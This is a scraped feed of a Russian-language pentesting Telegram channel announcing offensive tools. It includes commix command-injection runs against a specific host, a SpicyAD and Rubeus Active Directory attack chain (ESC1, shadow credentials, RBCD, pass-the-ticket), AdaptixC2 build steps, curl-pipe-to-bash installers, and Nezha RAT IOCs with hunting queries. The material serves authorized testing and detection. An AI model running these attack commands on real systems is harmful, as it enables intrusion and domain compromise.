UPD. Большой апдейт
Комбайн для эксплуатации Command Injection уязвимостей, написан на python
В
Установка:
git clone https://github.com/commixproject/commix.git commix
python commix.py -h
"Детский" режим:
python commix --wizard
Обычный запуск:
python commix -u https://62.173.140.174:16016/ --data 'action='
Поддержка тамперов:
python commix -u https://62.173.140.174:16016/ --data 'action=' --tamper=space2ifs
Список тамперов:
python commix --list-tampers#commix #python #pentest #soft #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚1
White Knight Labs
From Veeam to Domain Admin: Real-World Red Team Compromise Path | White Knight Labs
In many enterprise environments, backup infrastructure is treated as a “supporting system” rather than a high-value security asset. But during real red team
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Securelist
Using DCOM objects for remote command execution
Kaspersky expert describes how DCOM interfaces can be abused to load malicious DLLs into memory using the Windows Registry and Control Panel.
If you’re a penetration tester, you know that lateral movement is becoming increasingly difficult, especially in well-defended environments. One common technique for remote command execution has been the use of DCOM objects
#windows #dcom
Please open Telegram to view this post
VIEW IN TELEGRAM
RouterOS security analyzer for detecting misconfigurations, weak settings, and known vulnerabilities (CVE)
#network #mikrotik #routeros
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥2
GitHub
GitHub - the-useless-one/pywerview: A (partial) Python rewriting of PowerSploit's PowerView
A (partial) Python rewriting of PowerSploit's PowerView - the-useless-one/pywerview
Частично переписанный на Python PowerView из PowerSploit
Установка:
git clone https://github.com/the-useless-one/pywerview
cd pywerview
python3 -m venv venv
source ./venv/bin/activate
pip install -r requirements.txt
./pywerview.py --help
#pywerview #soft #ad
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
EVA is an AI-assisted penetration testing agent that enhances offensive security workflows by providing structured attack guidance, contextual analysis, and multi-backend AI integration
Установка:
# Ollama for local endpoint (optional)
curl -fsSL https://ollama.ai/install.sh | shr
# EVA installation
git clone https://github.com/ARCANGEL0/EVA.git
cd EVA
chmod +x eva.py
./eva.py
# Adding it to PATH to be acessible anywhere
sudo mv eva.py /usr/local/bin/eva
#ai #eva #agent
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Инструмент для проведения пентеста
Огромное количество изменений:
▪️ Built-in LDAP signing and channel binding checks▪️ RDP command execution▪️ certipy find integration▪️ raisechild module: automatic forest priv esc▪️ Dumping LSA/SAM via MSSQL▪️ etc
Установка в
sudo apt update && sudo apt install netexec
#nxc #netexec #python #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤1
Ontinue
Nezha: The Monitoring Tool That's Also a Perfect RAT
Research from Ontinue reveals how Nezha, a legitimate open-source monitoring tool, is being abused by attackers as a stealthy post-exploitation RAT.
Self-hosted, lightweight server and website monitoring and O&M tool. Detection only occurs when attackers execute commands through the agent
IOCs:
nz.632313373[.]xyz:8008
47.79.42[.]91
8008 - Default Nezha dashboard port
443 - Common alternative (46% of deployments)
80 - Common alternative (28% of deployments)
8888 - Alternative port
18008 - Alternative port
C:\nezha\nezha-agent.exe
C:\nezha\config.yml
C:\temp\nezha-agent.exe
C:\nezha.zip
/opt/nezha/agent/nezha-agent
/opt/nezha/agent/config.yml
nezha-agent.exe
nezha-agent
nezha_agent
services.exe → nezha-agent.exe
powershell.exe → nezha-agent.exe
nezha-agent.exe → powershell.exe
nezha-agent.exe → cmd.exe
nezha-agent.exe → whoami.exe
nezha-agent.exe → systeminfo.exe
nezha-agent.exe → net.exe
nezha-agent.exe -c C:\nezha\config.yml
client_secret
NZ_SERVER
NZ_CLIENT_SECRET
NZ_TLS
nezhahq
Queries:
// Hunt for Nezha agent process execution and file paths
DeviceProcessEvents
| where TimeGenerated > ago(90d)
| where FileName has_any ("nezha-agent", "nezha_agent")
or FolderPath has_any ("\\nezha\\", "/nezha/", "/opt/nezha/")
or ProcessCommandLine has_any ("client_secret", "nezhahq", "NZ_SERVER", "NZ_CLIENT_SECRET")
| project TimeGenerated, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName, InitiatingProcessFileName
| order by TimeGenerated desc
// Hunt for network connections to Nezha default ports and known infrastructure
DeviceNetworkEvents
| where TimeGenerated > ago(90d)
| where RemotePort in (8008, 8888, 18008)
or RemoteUrl has_any ("nezha", "nezhahq")
| project TimeGenerated, DeviceName, InitiatingProcessFileName, RemoteIP, RemotePort, RemoteUrl, ActionType
| order by TimeGenerated desc
// Hunt for Nezha configuration files and agent binaries on disk
DeviceFileEvents
| where TimeGenerated > ago(90d)
| where FileName has_any ("nezha-agent", "config.yml")
or FolderPath has_any ("\\nezha\\", "/opt/nezha/", "C:\\nezha")
| project TimeGenerated, DeviceName, ActionType, FileName, FolderPath, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by TimeGenerated desc
#nezha #ioc #detection #ti
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🤔2👍1🔥1
Довольно интересный инструмент, работает в интерактивном или режиме командной строки
SpicyAD is a C# Active Directory penetration testing tool designed for authorized security assessments. It combines multiple AD attack techniques into a single, easy-to-use tool with both interactive and command-line interfaces
Примеры:
# 1. Enumerate vulnerable templates
.\SpicyAD.exe enum-vulns
# 2. Exploit ESC1 (auto-chains to PKINIT)
.\SpicyAD.exe esc1 /template:ESC1 /target:administrator /sid
# 1. Add shadow credential to target machine
.\SpicyAD.exe shadow-creds add /target:SERVER$ /sid
# 1. Set RBCD
.\SpicyAD.exe rbcd set /target:SERVER$ /controlled:YOURPC$
# 2. Use Rubeus for S4U
Rubeus.exe s4u /user:YOURPC$ /rc4:<hash> /impersonateuser:administrator /msdsspn:cifs/SERVER.evilcorp.net /ptt
# 3. Access target
dir \\SERVER\C$
# 4. Cleanup
.\SpicyAD.exe rbcd clear /target:SERVER$ /force
#ad #windows #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2🔥2
The Ten Most Critical Web Application Security Risks
#owasp #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4
Forwarded from HaHacking
• SERVER-SIDE
• CLIENT-SIDE
• ADVANCED
Сборники информации:🔖 DingyShark/BurpSuiteCertifiedPractitioner🔖 botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study
Райтапы лабораторий:📖 frank-leitner/portswigger-websecurity-academy📖 thelicato/portswigger-labs
Сделайте доброе дело – докиньте свои райтапы в базу!
@HaHacking
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9
Удобный инструмент, предназначенный для поиска эксплоитов, известных уязвимостей и их эксплуатации с поддержкой AI (ChatGPT, Gemini, Grok и DeepSeek) и функцией импорта из популярных сканеров
sudo apt install sploitscan
Установка:
git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt
PyPi:
pip install --user sploitscan
Источники PoC'ов:
➡️ GitHub➡️ ExploitDB➡️ VulnCheck (нужен free API key)➡️ Packet Storm➡️ Nuclei
Импорт из:
Nessus (.nessus)
Nexpose (.xml)
OpenVAS (.xml)
Docker (.json)
В конфиге указываем API ключи поддерживаемых сервисов (config.json)
{
"vulncheck_api_key": "",
"openai_api_key": "",
"google_api_key": "",
"grok_api_key": "",
"deepseek_api_key": ""
}Поиск по CVE:
sploitscan CVE-2024-1709
sploitscan CVE-2024-1709 CVE-2024-21413
Поиск по ключевым словам:
sploitscan -k "Outlook Express"
Импорт и экспорт:
sploitscan --import-file path/to/yourfile.nessus --type nessus
sploitscan CVE-2024-1709 -e {json,csv,html}
Помощь AI:
sploitscan --ai openai CVE-2024-21413
┌───[ 🤖 AI-Powered Risk Assessment ]
|
| 1. Risk Assessment
| -------------------
| ...
| 2. Potential Attack Scenarios
| ------------------------------
| ...
| 3. Mitigation Recommendations
| ------------------------------
| ...
| 4. Executive Summary
| ---------------------
| ...
#sploitscan #poc #cve #python
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2👍2
▪️ Вендор - XSpeeder (китайский производитель)▪️ Уязвимый продукт - прошивка SXZOS, которая используется в устройствах SD-WAN, маршрутизаторах и оборудовании для сетевой инфраструктуры▪️ Тип - удалённое выполнение кода без аутентификации (pre-authentication RCE)▪️ CVSS - 9,8
#poc #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Обновление открытого шестнадцатеричного редактора для работы в
ImHex содержит всевозможные инструменты и функции, такие как средство просмотра энтропии и встроенный интерфейс для дизассемблера Capstone
Имеет пользовательский язык шаблонов, используемый для определения структур и типов данных, который обеспечивает автоматический анализ файлов и аннотацию
Написан на
#imhex #soft #cplusplus
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Forwarded from k3vg3n ch
Меньше суток назад pxmme1337 создал форум для багхантеров.
Сам сайт еще в разработке, но уже можно писать, комментировать, голосовать, а также загружать письма-чеки от h1/bugcrowd, тем самым анонимно показывая свои заработки (или хвастаясь).
Будем следить за проектом.
@k3vg3n_ch
Сам сайт еще в разработке, но уже можно писать, комментировать, голосовать, а также загружать письма-чеки от h1/bugcrowd, тем самым анонимно показывая свои заработки (или хвастаясь).
Будем следить за проектом.
@k3vg3n_ch
❤2
Всех с наступающим друзья!
Вышел major релиз лучшего open-source C2
Благодаря комьюнити, оптимизирована кодовая база фреймворка, туннели в разы быстрее прошлой версии, значительно проапгрейжен клиент, BOFы для LDAP, ADCS и еще много всего
Обзоры
UPD 1.0:
Изменения
Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal
sudo apt install mingw-w64 make gcc g++ g++-mingw-w64
wget https://go.dev/dl/go1.25.4.linux-amd64.tar.gz -O /tmp/go1.25.4.linux-amd64.tar.gz
sudo rm -rf /usr/local/go /usr/local/bin/go
sudo tar -C /usr/local -xzf /tmp/go1.25.4.linux-amd64.tar.gz
sudo ln -s /usr/local/go/bin/go /usr/local/bin/go
# for windows 7 support by gopher agent
git clone https://github.com/Adaptix-Framework/go-win7 /tmp/go-win7
sudo mv /tmp/go-win7 /usr/lib/
sudo apt install gcc g++ build-essential make cmake mingw-w64 g++-mingw-w64 libssl-dev qt6-base-dev qt6-base-private-dev libxkbcommon-dev qt6-websockets-dev qt6-declarative-dev
make server-ext
make client
#adaptixc2 #redteam #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11
sudo mv /year2025 /year.old
sudo touch /year2026
#newyear
Please open Telegram to view this post
VIEW IN TELEGRAM
5❤23
Отличный инструмент для ленивых, таких как я 😅 Покажет какой демон где, откуда и на каком интерфейсе крутится
Конечно есть
ss, lsof, ps aux с grep и т.д.Но здесь все в одном, рекомендую
Установка и примеры:
curl -fsSL https://raw.githubusercontent.com/pranshuparmar/witr/main/install.sh | bash
witr nginx
witr --pid 14233
witr --port 5000
#witr #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥3
MSFinger is a high-performance network fingerprinting tool designed for internal network reconnaissance. It rapidly identifies Microsoft services, detects security configurations, and highlights potential vulnerabilities across SMB, LDAP, and LDAPS protocols
#windows #ad #ldap #smb
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔2